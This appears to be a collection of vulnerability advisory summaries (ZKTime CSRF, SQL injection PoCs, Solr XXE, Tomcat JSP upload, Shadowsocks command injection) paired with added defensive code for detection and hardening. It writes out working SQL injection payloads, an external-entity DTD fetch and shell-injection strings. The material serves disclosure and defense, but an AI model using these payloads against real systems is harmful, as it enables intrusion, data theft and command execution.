If a long user name is used in a username/password combination in a site URL (such as http://UserName:Password@example.com), the resulting modal prompt will hang in a non-responsive state or crash, causing a denial of service.
The application is time-and-attendance software that lets users download their time and attendance data from the application in PDF format. The data includes employee IDs, user IDs, gender, dates of birth, phone numbers and access areas. Access to these PDF files, however, is not properly authenticated: anyone who obtains the file-download link can download the files directly without authenticating.
The ZKTime Web software lets an administrator elevate the privileges of an application user with a single click of a radio button named 'superuser'. The resulting request, however, carries no random token that would prevent Cross-Site Request Forgery, and no other protection mechanism (such as administrator password verification) is in place to block forged requests. An attacker can take advantage of this by crafting a link that adds the attacker as an administrator of the ZKTime Web software and using social engineering to trick the administrator into clicking the forged HTTP request. The request is executed and the attacker becomes an administrator of the ZKTime Web software.
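A server-side guard for the privilege-change request described above, added here as an example (not ZKTime Web's own code): it binds a CSRF token to the administrator's session and requires the password re-verification the entry says is absent. The request and session dictionary shapes, the check_password callback and the server-side secret are assumptions.

```python
import hashlib
import hmac
import secrets

# Added example, not ZKTime Web's own code. The per-deployment secret, the
# session layout and the request dictionary shape are assumptions.
SERVER_SECRET = secrets.token_bytes(32)   # kept server-side, never sent to the browser


def issue_csrf_token(session_id: str) -> str:
    """Mint a token only this session can present: nonce + HMAC over (session, nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())


def handle_superuser_change(request: dict, session: dict, check_password) -> tuple[int, str]:
    """Guard the 'superuser' radio-button request: POST only, session-bound token,
    and the administrator must re-enter their password (the two controls the
    entry says are missing). check_password(user, pw) is an assumed callback."""
    form = request.get("form", {})
    if request.get("method") != "POST":
        return 405, "privilege changes must be POSTed, never triggered by a GET link"
    if not verify_csrf_token(session["id"], form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    if not check_password(session["user"], form.get("admin_password", "")):
        return 403, "administrator password re-verification failed"
    return 200, f"superuser flag for {form.get('target_user', '?')} updated"
```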
SQL injection in the space_id parameter. Proof of Concept (PoC):
SQLi: https://localhost/[path]/booking-page/?step=3&space_id=9 AND SLEEP(5)&re_price=12
Parameter: space_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: step=3&space_id=9 AND SLEEP(5)&re_price=12
Career Portal is developed to create interactive job vacancy listings for candidates. SQL injection in the keyword parameter. Proof of Concept (PoC):
SQLi: https://localhost/[path]/job
Parameter: keyword (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: keyword=s_term') AND (SELECT 8133 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT (ELT(8133=8133,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('kRoT'='kRoT&location_name[]=
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: keyword=s_term') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a7171,0x594547646454726868515056467764674e59726f4252436844774f41704a507353574e4b6d5a5973,0x71787a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zANd&location_name[]=
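Detection logic for the payload families in the two PoCs above (time-based SLEEP, error-based FLOOR(RAND(0)*2), and the UNION ... NULL column probe), added here as an example that is not part of these advisories. The access-log lines and POST bodies are constructed to mirror the payloads, and the log format is assumed to be Apache combined format.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the advisories above. Signatures mirror the three
# PoC payload families shown (SLEEP, FLOOR(RAND(0)*2), UNION ... NULL); the log
# lines and request bodies are constructed, not captured traffic.
SQLI_SIGNATURES = {
    "time-based blind (SLEEP)": re.compile(r"\b(?:and|or)\b\s*\(?\s*sleep\s*\(\s*\d+\s*\)", re.I),
    "error-based (FLOOR/RAND)": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "UNION with NULL columns": re.compile(r"union\s+(?:all\s+)?select\b(?:\s*null\s*,){2,}", re.I),
}
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def normalize(value: str) -> str:
    """Decode URL encoding twice (double encoding is a common evasion) and squeeze whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(value)))


def scan_request(query_or_body: str) -> list[tuple[str, str]]:
    """Return (parameter, signature) pairs for every parameter value that matches."""
    hits = []
    for pair in query_or_body.split("&"):
        name, _, raw = pair.partition("=")
        value = normalize(raw)
        hits.extend((name, label) for label, rx in SQLI_SIGNATURES.items() if rx.search(value))
    return hits


def scan_log_line(line: str) -> list[tuple[str, str]]:
    """Pull the request target out of a combined-format access log line and scan its query string."""
    m = LOG_RE.search(line)
    if not m or "?" not in m.group("path"):
        return []
    return scan_request(m.group("path").split("?", 1)[1])


# Constructed samples: the first line carries the space_id PoC, the second is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /booking-page/?step=3&space_id=9%20AND%20SLEEP(5)&re_price=12 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /booking-page/?step=3&space_id=9&re_price=12 HTTP/1.1" 200 512',
]
# Constructed POST bodies for the Career Portal keyword parameter (bodies are not in
# access logs, so in practice they come from a WAF or application log instead).
ERROR_BODY = ("keyword=s_term') AND (SELECT 8133 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,"
              "(SELECT (ELT(8133=8133,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS"
              " GROUP BY x)a) AND ('kRoT'='kRoT&location_name[]=")
UNION_BODY = "keyword=s_term') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a7171,0x41,0x71787a7871),NULL,NULL-- zANd&location_name[]="
```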
This use-after-free is due to a race condition between fanout_add (from setsockopt) and bind on an AF_PACKET socket. The race causes __unregister_prot_hook(), called from packet_do_bind(), to set po->running to 0 even though a packet_fanout has already been created by fanout_add(). This bypasses the check in unregister_prot_hook() called from packet_release(), so the packet_fanout is released while still being referenced from the packet_type linked list.
Lucene includes a query parser that can build the full spectrum of Lucene queries from an XML data structure. Starting with version 5.1, Solr supports the 'xml' query parser in search queries. The problem is that the Lucene XML parser does not explicitly prohibit DOCTYPE declarations or the expansion of external entities, so the XML document can include special entities that point to external files (via file://) or external URLs (via http://). When Solr parses such a request, it makes an HTTP request to http://xxx.s.artsploit.com/xxx and treats the response as the DOCTYPE definition. Because the parser type can be chosen in the search query, which very often comes from untrusted user input such as search fields on websites, an external attacker can make arbitrary HTTP requests to the local Solr instance and bypass all firewall restrictions. For example, this vulnerability could be used to send malicious data to the '/upload' handler. It can also be exploited as a blind XXE using the ftp wrapper to read arbitrary local files from the Solr server.
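The missing control described above, shown as a front-end check for XML query input that refuses any DOCTYPE or entity declaration and never lets the parser fetch an external entity. This is an added example in Python, not Lucene's or Solr's code; the query documents are constructed, and the element names only follow the general Lucene XML query shape.

```python
import xml.parsers.expat as expat

# Added example, not Lucene's or Solr's own code: a gate for XML query input
# that aborts on any DOCTYPE/entity declaration and never resolves external
# entities. The sample query documents are constructed.


class UnsafeXmlQuery(ValueError):
    pass


def parse_xml_query(document: str) -> list[str]:
    """Parse an XML query document and return the element names encountered.
    Any DOCTYPE (hence any external DTD or entity) aborts the parse."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)  # no external DTD subset
    seen: list[str] = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlQuery(f"DOCTYPE {name!r} (system id {sysid!r}) is not allowed in query input")

    def on_entity_decl(*_):
        raise UnsafeXmlQuery("entity declarations are not allowed in query input")

    def on_external_entity_ref(context, base, system_id, public_id):
        return 0  # tell expat the reference is unresolved; nothing is fetched

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity_ref
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(document, True)
    return seen


def is_safe_xml_query(document: str) -> bool:
    """True only for well-formed query XML with no DOCTYPE and no entities."""
    try:
        parse_xml_query(document)
        return True
    except (UnsafeXmlQuery, expat.ExpatError):
        return False


# Constructed inputs: a plain Lucene-style query and the two DOCTYPE shapes the entry describes.
GOOD_QUERY = "<BooleanQuery><Clause occurs='must'><TermQuery fieldName='title'>solr</TermQuery></Clause></BooleanQuery>"
EXTERNAL_DTD = '<!DOCTYPE x SYSTEM "http://xxx.s.artsploit.com/xxx"><x/>'
FILE_ENTITY = '<!DOCTYPE x [<!ENTITY e SYSTEM "file:///placeholder/path">]><x>&e;</x>'
```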
When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.
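A configuration audit for the condition in this entry, added as an example (not Tomcat's own code): it reads a web.xml and reports whether the DefaultServlet has readonly set to false, shown against the shipped default of true. The two web.xml fragments are constructed.

```python
import xml.etree.ElementTree as ET

# Added example, not Tomcat's own code. It audits a web.xml for the condition in
# the entry above: a DefaultServlet whose 'readonly' init-param is false, which
# lets HTTP PUT write files. The two web.xml fragments are constructed.
DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"


def _local(tag: str) -> str:
    """Strip the XML namespace so Tomcat 7 (java.sun.com) and 8/9 (xmlns.jcp.org) web.xml both work."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name: str) -> str:
    return next((c.text or "" for c in elem if _local(c.tag) == name), "").strip()


def default_servlet_put_enabled(web_xml: str) -> bool:
    """True when a servlet backed by DefaultServlet has readonly=false (PUT/DELETE accepted)."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet" or _child_text(servlet, "servlet-class") != DEFAULT_SERVLET:
            continue
        for param in servlet:
            if _local(param.tag) == "init-param" and _child_text(param, "param-name") == "readonly":
                return _child_text(param, "param-value").lower() == "false"
    return False  # readonly defaults to true when the init-param is absent


def _web_xml(readonly_value: str) -> str:
    return f"""<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>{DEFAULT_SERVLET}</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>{readonly_value}</param-value></init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>"""


WEAK_WEB_XML = _web_xml("false")   # the setting that exposes the JSP upload path
SAFE_WEB_XML = _web_xml("true")    # Tomcat's shipped default
```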
Log file manipulation is possible via a manipulated hostname sent to the server by a client, even when Shadowsocks runs as quietly as possible with '-qq'. For example, the string 'I could be any log entry' can be sent as the hostname, and the server will log an additional line containing 'I could be any log entry'. Command execution is likewise possible via a manipulated hostname sent to the server by a client: a string such as ';touch /tmp/x41' sent as the hostname causes the server to execute the command 'touch /tmp/x41'.
Shadowsocks-libev offers local command execution via its configuration file and/or, additionally, code execution via a UDP request to 127.0.0.1. The configuration file on disk, or the JSON configuration received via UDP, is parsed and its arguments are passed to the 'add_server' function. That function calls 'construct_command_line(manager, server);', which returns a string built from the parsed configuration. The string is executed at line 486 by 'if (system(cmd) == -1) {', so if a configuration parameter, for instance the 'method' parameter, contains '||evil command&&', the evil command is executed.
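The flaw in the two Shadowsocks entries above, reproduced in Python as an added example (not shadowsocks-libev's own C code): a config value spliced into one shell string, the way construct_command_line() and system() combine, shown beside a version that validates every field and hands an argv list to the process with no shell, plus the log escaping that stops a client hostname from forging an extra log line. The JSON keys follow the entry (server, server_port, method); the cipher-name pattern and hostname rule are assumptions.

```python
import re
import subprocess

# Added example in Python, not shadowsocks-libev's own C code. Field names follow
# the JSON config keys (server, server_port, method); the cipher-name pattern and
# hostname rule are assumptions, not the project's own validation.
METHOD_RE = re.compile(r"[a-z0-9][a-z0-9-]{2,40}")                # e.g. aes-256-gcm
LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*", re.I)         # DNS names and dotted IPv4

def vulnerable_command_line(server: dict) -> str:
    """The pattern that goes wrong: whatever 'method' holds becomes part of a shell command."""
    return f"ss-server -s {server['server']} -p {server['server_port']} -m {server['method']}"

def build_argv(server: dict) -> list[str]:
    """Validate every field, then build an argv list; no shell ever parses these values."""
    method = str(server.get("method", ""))
    if not METHOD_RE.fullmatch(method):
        raise ValueError(f"rejected cipher name {method!r}")
    host = str(server.get("server", ""))
    if len(host) > 253 or not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected server address {host!r}")
    port = int(server.get("server_port", 0))
    if not 1 <= port <= 65535:
        raise ValueError(f"rejected port {port}")
    return ["ss-server", "-s", host, "-p", str(port), "-m", method]

def config_is_accepted(server: dict) -> bool:
    """Convenience wrapper: does this server block pass validation?"""
    try:
        build_argv(server)
        return True
    except ValueError:
        return False

def start_server(server: dict, runner=subprocess.run):
    """Launch with an argv list (shell=False); 'runner' is injectable so this runs offline."""
    return runner(build_argv(server), shell=False, check=False)

def log_safe(hostname: str) -> str:
    """Escape control characters before logging a client-supplied hostname, so a value
    containing a newline cannot forge an additional log line."""
    return "".join(ch if ch.isprintable() else f"\\x{ord(ch):02x}" for ch in hostname)
```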